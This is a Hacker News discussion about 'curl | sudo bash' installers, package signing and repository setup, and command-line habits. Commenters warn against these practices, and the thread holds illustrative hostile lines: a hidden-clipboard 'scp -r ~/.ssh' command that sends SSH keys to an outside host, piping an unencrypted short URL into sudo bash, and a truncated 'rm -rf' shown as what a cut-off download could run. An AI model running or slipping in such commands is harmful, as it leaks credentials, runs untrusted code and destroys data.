The sad state of sysadmin in the age of containers (vitavonni.de)
970 points by Spakman on April 22, 2015 | 443 comments



This bothers me as well. Even tasks as simple as adding a repository are now being "improved" with a curl | sudo bash style setup[1].

However, installing from source with make was (and remains) a mess. It may work if you're dedicated to maintaining one application and (part of) its stack. But even then it usually leads to out of date software and tracking versions by hand.

Many people have this weird aversion to doing basic sysadmin stuff with Linux. What makes it weird is that it's really simple. Often easier than figuring out another deploy system.

(The neckbeard in me blames the popularity of OSX on dev machines.)

[1] https://nodesource.com/blog/nodejs-v012-iojs-and-the-nodesou...


I agree that the "just curl this into bash" instructions are a nightmare - on any platform.

I think a lot of this is a result of what I like to call the "Kumbaya approach to project/team management":

This is where you have a team (either for a single project or a team at a consulting agency, etc) that is effectively all development-focused staff, possibly with some who dabble in Infrastructure/Ops. In this environment, when a decision about something like "how do we get a reliable build of X for our production server deployment system" needs to be made or a system needs to be supported, no idea is "bad", because no one has the experience or confidence to be able to say "that's a stupid idea, we are not making `curl http://bit.ly/foo | sudo bash` the first line of a deployment script"[1]

[1] yes this is an exaggeration, but there are some simply shocking things happening in real environments that are not far off that mark.

Edit: to make it absolutely clear about what I was referring to with [1]:

The specific point I was making was running something they don't even see (how many people would actually look at the script before piping it to bash/sh?) from a non-encrypted source, and relying on a redirection service that could remove/change your short URL at any time.

Unfortunately I was stupid enough to ddg it (duckduckgo it, as opposed to google it) and apparently this exact use-case was previously the recommended way of installing RVM[2]

[2] http://stackoverflow.com/questions/5421800/rvm-system-wide-i...



I think part of this is because there aren't any trusted, fully open source, artifact repositories that work with the various package indices out there.

Like, most of the way deployment should work is that you come up with some collection of packages that need to be installed and you iterate through and install them. Bob's your uncle.

Thing is, all the packages you need live out in the wild internet. Ideally, you'd just be able to take a package, vet it, and put it in your local artifact store and then when your production deployment system (using apt or yum or pip or gems or maven or whatever) needs a package, it looks at your local artifact store and grabs it and goes about its business. Never knowing or touching the outside world.
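
With pip, for instance, that last hop is just pointing the client at the internal index; a minimal sketch with a made-up mirror URL:

    # sketch only: the URL and package name are placeholders
    pip install --index-url https://artifacts.internal/simple/ requests
    # or persist it for every install on the box
    printf '[global]\nindex-url = https://artifacts.internal/simple/\n' > ~/.pip/pip.conf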

And your developers would all write their apps to deploy through the normal packaging methods that everyone and their mother is already familiar with and they could just put them into the existing package index as well.

But you've gotta lay out pretty serious moola (from when I last looked into available solutions to this) or set up a half dozen different artifact stores if you want to do things that way. And good luck managing your cached and private artifacts if you do. And on top of that developers don't necessarily know how to set up a PyPi or a RPM index or whatever so that the storage is reliable and you've got the right security settings or whatever else. (I know I sure don't and I'm not really interested in reading all of the ones I'd end up needing).


"And on top of that developers don't necessarily know how to set up a PyPi or a RPM index or whatever so that the storage is reliable and you've got the right security settings or whatever else. (I know I sure don't and I'm not really "

Setting up RPM is shockingly easy. It can get more complex, but the basic system is:

  REPOBASE=/srv/www/htdocs/
  createrepo -v  $REPOBASE
  gpg -a --detach-sign --default-key "Sign Repo" $REPOBASE/repodata/repomd.xml
  gpg -a --export "Sign Repo" > $REPOBASE/repodata/repomd.xml.key
That will create a repo from all the .rpm files in the REPOBASE. Also you will of course need a GPG key pair, but that can be generated with `gpg --gen-key` where you give it a description of "Sign Repo" (or change the above commands to the key description you used).

Then you get to decide on the deployment machine if you want to trust the repo (or you don't trust any and import the key via some other process, aka direct gpg import).
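
The client side is just as small - roughly the following, with the repo name, URLs, and package name all placeholders:

    # /etc/yum.repos.d/internal.repo
    #   [internal]
    #   name=Internal packages
    #   baseurl=https://repo.internal/
    #   repo_gpgcheck=1     # verify the signed repomd.xml created above
    #   gpgcheck=1          # also verify package signatures, if you sign them
    #   gpgkey=https://repo.internal/repodata/repomd.xml.key

    rpm --import https://repo.internal/repodata/repomd.xml.key   # or distribute the key out of band
    yum install yourpackage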

Of course you can find a bunch of more detailed explanations with $SEARCHENGINE, but if it takes more than a day to figure it out, you're doing something wrong.

Building a set of RPMs isn't that much harder if you have a proper build system. But these are the kinds of things you give up when you decide to grab the latest immature hotness created by someone on their day off.


With Docker, as referenced in TFA... you can simply vet a base image and use that for your application. Upgrades? Create a new/updated base image and test/deploy against that.


And how do you "simply vet a base image"?


Same as everything: look at how it was built. Many of the images are built by CI systems according to Dockerfiles and scripts maintained in public GitHub repos. Audit those, then use them yourself if you're worried about the integrity of the services and systems between the code and the repository.
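
A rough sketch of that workflow (the repo URL, registry, and tag below are placeholders):

    # audit the Dockerfile and its build context yourself...
    git clone https://github.com/example/base-image.git && cd base-image
    less Dockerfile
    # ...then build and tag your own copy rather than trusting the hub-built image
    docker build -t registry.internal/base:audited-2015-04 .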


> Unfortunately I was stupid enough to ddg it (duckduckgo it, as opposed to google it) and apparently this exact use-case was previously the recommended way of installing RVM[2]

Not only "previously", it's the current recommended way to install rvm. From their front page:

>> curl -sSL https://get.rvm.io | bash -s stable

[1] http://rvm.io/


It's also (one of the) recommended ways to do it for Docker[1]. I've noticed a few blog posts that touch on "here's how to use Docker for X" suggest piping it straight into `sudo sh` without so much as looking at what's going to be run first. Sigh.

[1] http://get.docker.io/


Oh I agree there are problems still, but it's an improvement over the previous approach - it's using HTTPS and it's calling the RVM domain - before it was plain HTTP to bit.ly.


Also the installer is now signed via GPG.

https://rvm.io/rvm/security


But then there's a circular dependency because the GPG key is retrieved by the bash script that is wget'd.


It doesn't have to be circular. The script is secured by HTTPS (and hopefully has the key embedded in the script itself?) which can then retrieve the installer and verify it using the key.


The problem is that in this scenario, the GPG key and signature serves no practical purpose.

The whole security, whether GPG is invoked or not, relies on the security of the HTTPS connection alone.

If the HTTPS cannot be trusted alone, then everything is lost, as a compromised HTTPS connection can be used to supply both a compromised GPG key and a compromised package, or, indeed, anything at all that is legal to `| sudo bash`...

And HTTPS security boils down to:

1. The difficulty of altering (or exploiting privileged position wrt) the global routing table to setup MitM or MitS scenarios.

2. The difficulty of obtaining a valid looking certificate for an arbitrary domain.

Any situation where a government actor is the adversary poses intractable challenges to both 1 and 2 above. (And before you say NSA/GCHQ would never care about XYZ, consider China...)


Even if you trust "normal" https certificates, it's still a much more risky proposition. Those certificates only really say that somebody controls the domain - not (in general) that he actually owns it or is responsible in any way, and, more critically, they don't vet whether somebody is trustworthy or not. You can easily get some other similar-sounding domain as a malicious agent, and validly get an https certificate for that.

So even if you trust https works, it's still a tricky proposition - it's not really similar to a distro's package distribution channel.


Indeed, and I didn't even go over trusting the actual source of the bash script or the security/integrity of the server(s) it's hosted on even if the cert is all A-OK.


It gives people a way to choose the level of security they care about. Those who are willing to trust HTTPS can trust HTTPS. Those who aren't can obtain the GPG key and check its signature by another mechanism (WoT) and manually verify the package signature.


Those who would go out of their way to do the GPG check are also the same people who are horrified by `curl .... | sudo bash`


Yes, that's the point. Those who aren't horrified can do that. Those who are can get the package "by hand" and do the GPG check themselves.
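
In practice that manual path looks something like this (the key ID and URLs here are placeholders, not RVM's actual ones):

    # fetch the installer and its detached signature, verify, and only then run it
    curl -sSLO https://get.example.io/installer
    curl -sSLO https://get.example.io/installer.asc
    gpg --keyserver hkp://keys.example.org --recv-keys 0xDEADBEEF
    gpg --verify installer.asc installer && bash installer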


Same issue when people post GPG keys on their website. You can't verify them.


That only becomes applicable if you use their "manual" install steps on that security page.


Am dealing with this situation right now. Apparently wget -qO- https://get.docker.com/ | sh as root[1] is the "supported" way of installing Discourse

[1]: https://github.com/discourse/discourse/blob/master/docs/INST...


No, that's the Discourse install instructions' quick, hand-wavy way of telling you to install Docker if you don't already have it. If your cloud environment already has Docker installed, you can skip that step.

Are you really trying to say that the instructions for installing Docker should be considered in-scope for a guide to install Discourse on a cloud server?

They've included a short snippet that will get you Docker, in the way recommended by Docker, for whatever your base system is. Many production systems do not move at the pace of Docker development, so it's not practical to run Docker from your distribution's package archive. Some distros will not have distributed packaged Docker releases at all.

What's wrong with these instructions? If you are really "dealing with this" right now, it is worth noting that something like 20 or more supported platforms have specific Docker installation instructions from the Docker website.

https://docs.docker.com/installation/#installation

From a quick sample of those instructions, only the Ubuntu instruction page uses the wget|sh method, and it's using an SSL connection to Docker's own website to add an apt source with signatures in the supported way. This should work on any Debian-based or yum-based distro, and writing the instructions like this most likely saves Discourse from getting a lot of "How do I docker" issues and e-mails from their clueless users.

So, would you prefer that part just says "installing Docker is out of scope" or should the Discourse developers go through every distro and cloud system and document the specific instructions for that? To do that would completely defeat the purpose of even using Docker at all.


I concur - to elaborate, I'm not actually the one installing Discourse. I support a 'Kumbaya' group of data scientists who have never heard of docker.

Quick directions like these aren't questioned by users who just want to get things done, and they invite security risks just as the parent & article suggest.


There are many more depressing examples of this at http://curlpipesh.tumblr.com


Funny tumblr but makes me care-confused.

I understand that curl pipe sh could have security problems but I also don't see it as that much different than the "normal" and "ok" way of doing things. I would consider something like the below pretty normal.

  wget https://whatever.io/latest.tgz
  tar xzf latest.tgz
  cd whatever-stable
  ./configure && make
  sudo make install
Because of familiarity, we aren't going to be too worried about what we are doing. If we are on a secure system (like a bank or something) then we've probably already gone through a bunch of hoops (source check, research) and we mitigate it like anything else.

What is so different about

  curl https://whatever.io/installer.sh | sudo bash
We didn't check the md5s in the first example, so yolo, we don't care about the content of the tarball we just `make install`-ed. We're assuming the webserver isn't compromised and that https is protecting the transfer. Is it because the tarball hit the disk first? Does that give us a warm fuzzy? Is it because "anything could be in installer.sh!!!?! aaaaah!". Well, anything could be in Makefile too right? Anything could be in main.c or whatever.

I agree that curl sh | sudo bash makes my spidey sense tingle. But if I really cared, I would read the source and do all the normal stuff anyway. So I think it's some kind of weird familiarity phase we're all in.


Outside of a development environment, you'd run that ./configure && make install step on a build slave that creates a nice RPM or Debian package of it for you which you can install without fear that the build scripts install backdoors, download obsolete software or wipe the filesystem.

With a good build system (eg. autotools) writing an RPM spec takes almost no time at all and if you have the proper infrastructure in place for building packages, you can have something workable in a very short time.

Self-packaged RPMs also don't need to be quite as high-quality as ones you might want to include in a distribution, so if it makes sense for your use case, it's perfectly okay to have "bloat" (eg. an entire python virtualenv) in your package.
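
As a sketch of how little ceremony that is (the package name is made up; assumes the rpmdevtools helpers are installed):

    rpmdev-setuptree                   # creates ~/rpmbuild/{SPECS,SOURCES,...}
    cp mytool-1.2.tar.gz ~/rpmbuild/SOURCES/
    rpmdev-newspec mytool              # skeleton spec to fill in; %build is basically %configure and make
    rpmbuild -ba mytool.spec           # spits out both the SRPM and the binary RPM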


> With a good build system (eg. autotools)

Yikes. Have we sunk this far?


I wouldn't consider what you presented as the "normal" or "ok" way of doing things either, especially not on anything resembling a live (i.e. not development/sandbox) environment.

A distro (or official vendor, or possibly a trusted third-party) repo of pre-built, signed packages would always be my first choice.

If one of those isn't available, my next step would be to create a package for the tool in question, part of which is setting up a file for `uscan` to download new source archives, and compare against the signatures.

In this scenario we (as in the organisation) are now responsible for actually building and maintaining the package, but we can still be assured that it's built from the original sources, we can still install it on production (and even dev, staging, whatever) servers with a simple call to apt/aptitude, and dependencies, removal, upgrades, etc are still handled cleanly.
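
For the curious, the uscan part is just a tiny debian/watch file plus one command; a sketch with placeholder URLs:

    # debian/watch (version 4 format), checking upstream's detached signatures:
    #   version=4
    #   opts=pgpsigurlmangle=s/$/.asc/ \
    #   https://releases.example.org/mytool-([\d.]+)\.tar\.gz

    uscan --verbose --download    # fetch the newest upstream tarball and verify it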


About "ok". You're right. I probably used a loaded word without context. I too use whatever default package repo, followed by "extras" or whatever is available. You described a sane and nice process. I guess my point is, at some point we are are assuming "many eyes" (the binaries might be built with the previously mentioned make;configure steps) unless you are auditing all sources which is unlikely. Especially unlikely on dev machines. Even after that it seems like there is an infinite continuum of paranoia.

I find it interesting that binary packages have existed for decades and yet `rpm etc` knowledge is rare. Why did curl sh become popular? Why doesn't every project have rpm|deb download links for every distro version? Why don't github projects have binary auto-builds hosted by github? I'd argue that it's too difficult. Binary packaging didn't succeed universally. For deployment, containers are (in the end) easier.

But the original article is conflating container concepts and user behavior (not wrongly). If docker hub does end up hosting malware-laden images, it would be interesting emergent behavior but it would be orthogonal to containers. Like toolbars. Toolbars probably aren't evil. A vector for evil maybe?


> I find it interesting that binary packages have existed for decades and yet `rpm etc` knowledge is rare

What makes you think the knowledge is rare? Among developers who actively target linux distributions I would imagine the opposite is true.

Even a number of the referenced curl|bash offenders are just using that as a "shortcut" to add their own apt/yum repos and calling apt-get/yum to install their binary package(s).
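
i.e. the general shape is usually no more than this (every name and URL below is a placeholder):

    curl -fsSL https://repo.example.com/gpg | sudo apt-key add -
    echo "deb https://repo.example.com/apt stable main" | sudo tee /etc/apt/sources.list.d/example.list
    sudo apt-get update && sudo apt-get install -y example-package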


Your first example allows for:

* Using checkinstall to create a local deb/rpm which can be easily installed/removed later instead of "make install".

* What if installer.sh says "rm -rf /tmp/PACKAGE-build" and the connection is interrupted just after the first "/"? You now have "rm -rf /". Oops.

* configure will tell you what files it needs, and apt-file will tell you what dependencies to install.

* I know what make install does. I know make. Who wrote installer.sh? Do they know anything about writing good software? Steam wiped out home directories; who knows what these people do.


It's bad because `sh`, `bash`, etc. don't wait for the script that's being piped into them to finish downloading before they start executing it. So, for example, if you're running a script with something like

    # remove the old version of our data
    sudo rm -rf /usr/local/share/some_data_folder
and the network connection cuts out for whatever reason in the middle of that statement (maybe you're on a bit of a spotty wireless network), the resulting partial command will still be run. If it were to cut off at `sudo rm -rf /usr`, then your system is in all likelihood going to be hosed.
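
One mitigation some installer scripts use is to wrap everything in a function and call it only on the very last line, so a truncated download dies with a syntax error instead of half-executing; a sketch:

    main() {
        # remove the old version of our data
        sudo rm -rf /usr/local/share/some_data_folder
        # ... rest of the install ...
    }
    main "$@"    # nothing runs until the whole script has arrived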


Because now your ability to install your mission-critical software is dependent upon https://whatever.io actually being up. Which it certainly won't be forever.

Or, you know, maybe someone updated the whatever.io installer to make it 'better'. But you are trying to debug some problem and you made one image last month and another one this month and you're pulling your hair out trying to figure out why they are different. Oh, it's because some text changed on some web site somewhere.

You've taken a mandatory step and put it outside your sphere of control.


Good point. I guess you could still wget the script though. It's maybe like ./configure over http? I guess even if you could do it, it's probably not the culture. A Dockerfile would probably just curl sh the thing and not wget it. So the default culture probably does depend on whatever.io being up.


>[1] yes this is an exaggeration

No, it's not :(


It's just automated copy-pasting of commands you don't understand from the internet, which is something everyone who runs Linux (and is not a wizard) does all the time.

It's really really bad, but people will continue doing it until commands/things become so easy we can actually understand what we're doing. Unfortunately, this has never been a priority in Unix-land as far as I've gathered.


It's really really bad, but people will continue doing it until commands/things become so easy we can actually understand what we're doing.

But it isn't all that hard to understand a clean Unix. I have never copied or typed a command that I don't understand.

One problem may be that most Unices these days are not as clean anymore as, say, OpenBSD or NetBSD. E.g. the recent X stack, with D-BUS, various *Kits, etc., is quite opaque. This madness was primarily contained to the desktop and proprietary Unices, but seems to spread through server Linuxes these days as well (and no, this is not an anti-systemd rant).


> But it isn't all that hard to understand a clean Unix. I have never copied or typed a command that I don't understand.

Well, good for you. I can assure you that it's not the case for almost anyone who approached Linux after the likes of Mandrake were released and/or tried to make it work on anything different from a traditional server.

I'm all for trying to understand what one is doing (and I wholeheartedly agree with TFA's point), but the reality is that very few people in the world really understand all intricacies of one's operating system. This does not excuse poor security practices, but it explains their background.


That's why you get someone who is capable of understanding it.

You wouldn't hire some high school kid who's just about taught themselves HTML by reading a book for a week, and get them to write your web application from ground up. You'd hire someone who knows what they're doing. Why is it seen as any different for Operations work? There is a reason systems administration is a skilled field, and a reason they're paid on a par with developers.


I think the reason this happens less and less is that sysadmins are cost centers, not revenue generators. When you have developers do that work (poorly or not), you don't have a group that's purely cost. Those costs get hidden in the development group.


Whoops replied to wrong comment!

However yes, the issue of a team that "doesn't make money" is very real. Maybe it should be "marketed" like legal or accounting: it doesn't make money, it saves the money that SNAFUBAR situations would otherwise cost.


Indeed, the costs merely get hidden and a lot of system decisions boil down to one of:

1. I saw it done that way in some blog.

2. We did it like that at my last job.

3. Seems like it works.


That high school kid needs to install a web server. Is he going to hire someone? No. He's going to copy a curl command.


I expect her to say "How do I install software on this platform?" "Oh! /(apt|yum|dnf)/!"

/(apt-get|yum|dnf) install (apache2|httpd|nginx|lighttpd)/


It's probably okay for him.


I'm all for trying to understand what one is doing (and I wholeheartedly agree with TFA's point), but the reality is that very few people in the world really understand all intricacies of one's operating system.

One of the problems (as I tried to argue) is that most Unices have become far more complex. The question is if the extra complexity is warranted on a server system, especially if bare Unix (OpenBSD serves as a good example here) was not that hard to understand.

Of course, that doesn't necessarily mean that we should look back. Another possibility would be to deploy services as unikernels (see Mirage OS) that use a small, thin, well-understood library layer on top of e.g. Xen, so that there isn't really an exploitable operating system underneath.


What seems to be the source of this push is that some entity wants Windows Group Policy-like control over what users can and can't do, etc.

This is because they want to retain their ability to shop for off-the-shelf hardware, while getting away from a platform that has proven less than functional for mission-critical operations (never mind being locked to a single vendor).

What seems to be happening is that there is a growing disdain for power users and "admins". The only two classes that seems to count are developers and users, and the latter needs to be protected from themselves for their own good (and developer sanity).


> I have never copied or typed a command that I don't understand.

Note that it's trivial to change what goes into the clipboard too. Copying and pasting commands from potentially untrustworthy sites should be ruled out too, even if they are understood.


https://xkcd.com/1168/ comes to mind. And yes, I Google half of the command invocations too (but usually type them in by hand so that I can remember them faster instead of copy-pasting).


I don't get this. Tar isn't that hard.

    x = eXtract files from an archive
    f = File path to the archive
    c = Create a new archive from files
    v = print Verbose output
    z = apply gZip to the input or output
That's 99% of common tar right there. The remaining one percent is:

    j = apply bzip2 to the input or output
        (I admit, j is a weird one here, though that has made it stick in my memory)
    --list = does what's on the tin
    --exclude = does what's on the tin
    --strip-components = shortcut for dropping a leading directory from the extracted files
I haven't used a flag outside of these in recent memory.
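
Put together, that covers just about everything I reach for (paths are made up):

    tar czf backup.tar.gz --exclude='*.log' project/         # create, gzip, skip the logs
    tar xf release.tar.gz --strip-components=1 -C /opt/app   # extract, drop the leading directory
    tar --list -f release.tar.gz                             # peek inside before extracting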


It isn't, but neither are the dozens or hundreds of other commands you encounter when working with the command line. I managed to memorize a few invocations of tar (I listed them in another comment) but, for instance, I very rarely create a new archive so I'm never sure what flag I need to use.

Part of the problem is that each command line utility has its own flag language, and equivalent functions often have different letters. For instance, very often one command has "recursive" as "-r" while another has it as "-R". It's impossible to remember it all unless you're a sysadmin.


Those case differences have meaning: -r is generally not dangerous while -R is; it's capitalized to make you stop and say hmmm, should I do this. All commands have the same flag language, command -options, and are all easily documented by man command; it quite literally couldn't get any simpler, and there's no need to memorize anything since you can look up any flag on any command with the same man command. Those who find it confusing haven't spent the least bit of effort actually trying, because it's actually very simple and extremely consistent.


> Those case differences have meaning, -r is generally not dangerous while -R is; it's capitalized to make you stop and say hmmm, should I do this. All commands have the same flag language

Except with cp, -R is the safe one and -r is the dangerous one. And there are tons of little inconsistencies like this.


As I said, generally. All human languages have inconsistencies, the command line is by far one of the most consistent ones any of us deal with.


It may be more consistent, but it is not easier - humans are generous with regard to input; they can infer intentions from context. I could type "please unbork this" to a human and he'd know precisely that he has to a) untargzip it, b) change the directory structure and c) upload it to a shared directory for our team.


Welcome to working with computers that can't think; easier is not an option, they can't infer your intentions, so your point is what? Consistency is what matters when working with machines and the command line is a damn consistent language relative to other available options.


That's exactly my point.


Frankly, if you're going to rely on a magic recipe from the web for production, you should absolutely document it locally and go through the process of understanding each command.

As a former sys admin, I did that all the time. Who the hell can remember how to convert an SSL certificate to load it into a Glassfish app server? Didn't mean I couldn't step through all commands and figure out why it did that before I loaded the new cert... And next time, I just need to go to my quick hack repo for the magic incantation.


I agree with this. Despite my familiarity with so many command line tools, I do forget invocations. And so I have a wiki page I share with my coworkers to share particularly useful (or correct) invocations of dangerous tools.

On a Unix based system, tar is just used so frequently and for so many purposes, that not understanding it feels a bit like working in a shop and not knowing how to use a roll of tape.


You don't have to be a sysadmin to be comfortable with command line tools. If you want to fully utilize your *NIX system you have to learn how to use that shit, it really isn't that hard.

(I'm a developer.)


I am comfortable with command line tools. I just don't remember every switch and flag I happen to use twice a year, and the fact that command line utilities are totally inconsistent in subtle but significant ways, coupled with the overall unreadability of man pages and lack of examples in them makes this process difficult.


I'm a very proficient user of command line tools, but I don't remember everything: my shell history is set to 50,000 lines, and it's the first thing I search if I've forgotten something.

Sequences of commands sometimes get pasted into a conveniently-located text file; if I find myself repeating the operation I might turn it into a script, a shell function for my .zshrc, or an alias.

Just 10 minutes ago:

    mysqldump [args] | nc -v w.x.y.z 1234
    nc -v -l 1234 | pv | mysql [args]

(after an initial test that showed adding "gzip -1" was slower than uncompressed gigabit ethernet.)


One way to remember these commands without necessarily going "full sysadmin" is to use them on a daily basis. Whether I am developing, managing files, debugging, or really doing anything other than mindlessly browsing the web, I always have at least one (and often many) xterms open. The huge selection of tools and speed of invocation provided by a modern *nix command line is invaluable for many tasks that are not directly related to administrating a system.


I usually get tar right on the first try. I only have to remember 2 variants (extract file and create file):

    tar xf ./foo #automagically works with bz2 and gz files
    tar cf /tmp/out.tar . #add z for compression


That second one will create a tarbomb[1], which isn't necessarily wrong and maybe it's what's right for your application, but for more general usage this is friendlier:

    tar cf <mydir.tar> <mydir>
[1] http://www.linfo.org/tarbomb.html


And some of those switches are just for convenience, e.g.:

    tar c . | gzip > /tmp/out.tar.gz


Oh cool. So that works? I've already memorized:

    tar -xvvzf foo.tar.gz
    tar -xvvjf bar.tar.bz2
    tar -xvvf  baz.tar
Thanks!


I would argue that anyone who is reasonably comfortable in a command line would resort to `man command`, `command --help` or `command -h` before googling for usage.


I think, occasionally, it's a lot easier to grok a command through googling than reading the built-in help. A fair amount of built-in *nix documentation I have run across is mediocre or unhelpful.


I often find that GNU man pages are heavy on explanation of options and light on purpose and practical usage (the latter is tucked away in info pages). That's not necessarily the wrong way to do manpages, but I much prefer OpenBSD-style manpages, which seem to be better at providing practical information.


Recursively searching through all files in the current folder (aka the normal use case for grep) is accomplished by using "grep -r". It's on line 270 in "man grep". And that assumes that you know what grep is at all. Would it have hurt so much to call grep "regexsearch" instead? Maybe -r could be the default?
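
For reference, the recursive invocations are at least short once you know the flag (pattern and paths are arbitrary):

    grep -rn 'TODO' .         # recursive, with line numbers
    grep -rl 'password' src/  # recursive, list matching file names only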


I think a lot of people would hate having it be recursive by default.


If it were up to me it would be called `find` and it would have flags to find files or text within files.


All the core unix tools have the problem of predating the vowel generation (http://c2.com/cgi/wiki?VowelGeneration).


'grep' isn't a case of disemvowelment (there's an e!), it's just a weird mnemonic that's outlived its referent.


Recursive is not the default use for grep. stdin-stdout filtering is.

"regexsearch" is more work to type and more space taken up everytime 'grep' appears in a command-line. And says nothing about recursion.


Recursion is caused by either -R or -r on nearly all commands and is pretty standard, and r is virtually never the default on any command because that would be a bad idea. And yes, having to type regexsearch rather than grep would have been a bad idea; while grep isn't a great name, it's far preferable to someone who types constantly. Search or find would have been better names; names need to be both short and descriptive on the command line, and short comes first.


Use the built-in search.

Edit: the rest of my comment (somehow submitted too soon!)

    man grep

    /recurs<enter>


or use 'grep':

    $ man grep | grep recursive
                  directory,  recursively,  following  symbolic links only if they
                  Exclude  directories  matching  the  pattern  DIR from recursive
           -r, --recursive
                  Read all files  under  each  directory,  recursively,  following
           -R, --dereference-recursive
                  Read all files under each directory,  recursively.   Follow  all


Nah, man pages are usually completely useless. I use man when I remember exactly what I want to do and just am not sure if the flag was -f or -F. For everything else there's google.


Being a few years gone from working purely in tech, and having a decade of OS X desktop usage, finally made me feel I'd gotten complacent. So I installed OpenBSD. Two things of note have happened:

1. I routinely need to look things up that are a bit murky in the deep recesses of my memory.

2. I am reminded continually of how nice it is to have man pages that are well written, are easily searchable, reference appropriate other pages, and are helpful enough to remind you of big picture considerations that you didn't realize you were facing when looking for a commandline flag.


Can you give an example of what you might turn to google for (and what you'd search for) that is more productive than checking a manpage/help output?


OK, recent simple example:

Google query: git display file at revision. Immediate answer (without even having to click any links, it's in the result description): `git show revision:file`

Total time: 5 seconds

Trying to reproduce with man and help:

  man git
search for display, finds nothing

start scrolling down

notice git-show (show various types of objects); sounds like a likely candidate

  git show <revision> <file>
..no output

  git show -h

  usage: git log [<options>] [<since>..<until>] [[--] <path>...]
     or: git show [options] <object>...
.. useful

  man git show
  man git-show
OPTIONS <object>... The names of objects to show. For a more complete list of ways to spell object names, see "SPECIFYING REVISIONS" section in git-rev-parse(1).

  man git-rev-parse
a lot about specifying revisions, nothing about how to actually specify a file

Give up. Google it.


One reason to keep reading man pages is that you will likely discover new things you did not expect. Also, reading man pages helps you to understand the tool's philosophy/workflow, if the man page is well written (which is often the case). This holds for any kind of documentation as well.

When I google something, I usually do not remember the answer to my question; the only thing I remember is the keyword to put in my future query to get the same answer. You will get your answer quicker, but you won't learn much. So personally, I prefer reading man pages (when I can) rather than using google.


I too find it much easier to google for actual working examples of commands rather than the abstract documentation in the manual.

Rsync, for example, where trailing slashes make a difference and it's not obvious from skimming the manual.

Looking at working code/commands often works better than piecing it together from the manual imo.


I never use man pages, to be honest, and I'm quite comfortable on a command line. Reading long-ish things in a terminal kind of sucks, for me, and even if I end up reading a man page in Chrome it's nicely formatted and has readable serif fonts and is easily scrolled with the trackpad on my laptop.


I probably haven't read a man page "cover to cover" since high school. Usually I just need to read a couple lines about a specific flag or the location of some configuration file which I can find quickly with a simple search or by scanning the document with my eyes.


Your terminal doesn't scroll with wheel/trackpad?


The wheel or trackpad scrolls the terminal's scrollback, not the pager program that happens to be running in it.

(I can imagine some sort of hackery that determines if less or something is running and scrolls that, but it sounds like a huge mess. Is that actually what you're doing? Does it send keypresses? What if you're in a mode where those keypresses do something besides scrolling?)


No I'm talking about scrolling in the actual program running - it's most useful in a pager obviously, but it also works for editors, and it works both locally (OS X, built-in Terminal.app) and over SSH on Debian hosts.

I'll be honest - I have ~no idea~ (edit: apparently there are xterm control sequences for mouse scrolling) how it's actually implemented, but several tools have some reference to mouse support (tmux, vim, etc) in option/config files, so it's probably available for your distro/platform and just needs to be enabled.

Further edit: (or PS. or whatever):

`less` pager supports mouse scrolling. `more` pager does not!


I just tried this on debian and my mouse wheel scrolls less inside of my terminal (and returns my previous line buffer when I type 'q').


It can do continuous scrolling of the terminal or line-by-line scrolling of the pager. Both are poor options for trying to actually read prose content inside the terminal, IMO, and opening a browser is easier.


What do you mean by "continuous" versus "line-by-line" scrolling? When I use the mousewheel to scroll a man page in xterm it behaves and appears the same as when I use the mousewheel to scroll a webpage in Chrome (the content moves smoothly up and down, disappearing at the top and bottom edges of the viewport).


Some man pages are really obscure though. I am thinking of PolicyKit and find, which can be as long and as arid.


It's not the same by any measure.

When you read the script in a browser, then paste it into a terminal, you know that "scp -r ~/.ssh u@somehost.com" isn't there.



Fair point.


Okay, but this relies on CSS trickery. If you had navigated to a text URL this would not be a vector.


What's a text url? The only way I can see this not being a vector is if you browse with css (and javascript for good measure) turned off. Or use lynx.


A page of text? With Content-type: text? An example being a shell script?


Do you think the average user copying and pasting administrative commands into their shell will stop to check the content encoding of the document they are copying from? Do you trust your browser not to try rendering an ill-defined document with an ambiguous extension?


Do you check the Content-type: header of the response for text/plain before copying? If you do, you'd be in the minority.


This is why you have a strong passphrase on your ssh private key.... right?


Hum... No. It's trivial to use those scripts to do all kinds of harm. A strong passphrase only protects against this one example.

For example, it won't protect against stealing the .ssh folder and installing a keylogger on your computer.


Copy-pasting from the internet can be just fine for things like (for example) yum install <blah>, because the tool itself has built-in checks to make sure that, before executing, you have a valid, non-corrupt package from someone you trust.
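
Concretely, that check is the gpgcheck machinery, and you can run the same verification by hand (the package name below is a placeholder):

    grep -H gpgcheck /etc/yum.conf /etc/yum.repos.d/*.repo   # confirm signature checking is enabled
    rpm -K some-package.rpm                                  # verify digests and GPG signature manually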


The point is that what ends up on your clipboard can be different from what you see and if a new line is there, then the command executes before you have a chance to change your mind.


It's easy enough to download a given/checked version of the script at http://foo.com/ubuntu/install and have that copied and run inside your docker image... for that matter, it's usually adding a given repository to your repo manager, then installing a given package from that software's corporate sponsors.

I don't think the problem is as rampant as it's made out to be in TFA... that said, most people don't look at said script(s), so it's entirely possible something could have been slipped in. For that matter, I think the issues outlined in the article relate more to overly complicated Java solutions (the same happens in the .NET space) that are the result of throwing dozens of developers, some with more or less experience than others, at a project, and letting a lot of code that isn't very well integrated slide through whatever review process does or doesn't exist.


In my experience, this is mainly describing the sad state of sysadmin work at tech startups. Larger and profitable tech companies tend to take sysadmin work a bit more seriously and give more resources and authority (and pay...) to their TechOps/Devops/Security teams.


It seems reasonably common in agency-type companies - at the start their "infra" is often an account with a managed web hosting company, and when their needs grow it doesn't always become a core part of the business.


> I think a lot of this is a result of what I like to call the "Kumbaya approach to project/team management"

I'm totally stealing this :)


I honestly don't see the issue.

I see the issue with doing it for the general public ala RVM, but internally where you control everything I don't see the issue with curl into sh.


It's also the recommended way to install Kubernetes.


> Many people have this weird aversion to doing basic sysadmin stuff with Linux. What makes it weird is that it's really simple. Often easier than figuring out another deploy system.

While I agree with the article's main points, the GNU build system is far from simple: basically an arcane syntax limited to Unix-based systems, with 5 or 6 100+ page manuals to cover it.

It doesn't excuse it - but I think it's easy to see why people turn to curl | sudo bash as the author puts it.


Maintaining autoconf/automake stuff is a pain. Using it is usually as simple as "configure;make;make install".

It doesn't do dependency management though, which is an externalised cost. But that's what rpm/deb do.

I see the attraction of containers and disk image based management. It's much less time consuming. But it's very much the opposite of ISO9001-style input traceability.


> Using it is usually as simple as "configure;make;make install".

"Usually" indeed. Because if it breaks, you do need to know the implementation details to figure out what's wrong.


That's the same for "wget|sh", apt-get, npm or any other system. Now, if the argument is that configure tends to break more often and for more obscure reasons, I can tentatively agree with that.


This is the reason why all these standalone things bundle everything into their installation process.

The problem is installing 206 different pythons on my system just makes it more likely that something else is going to break.


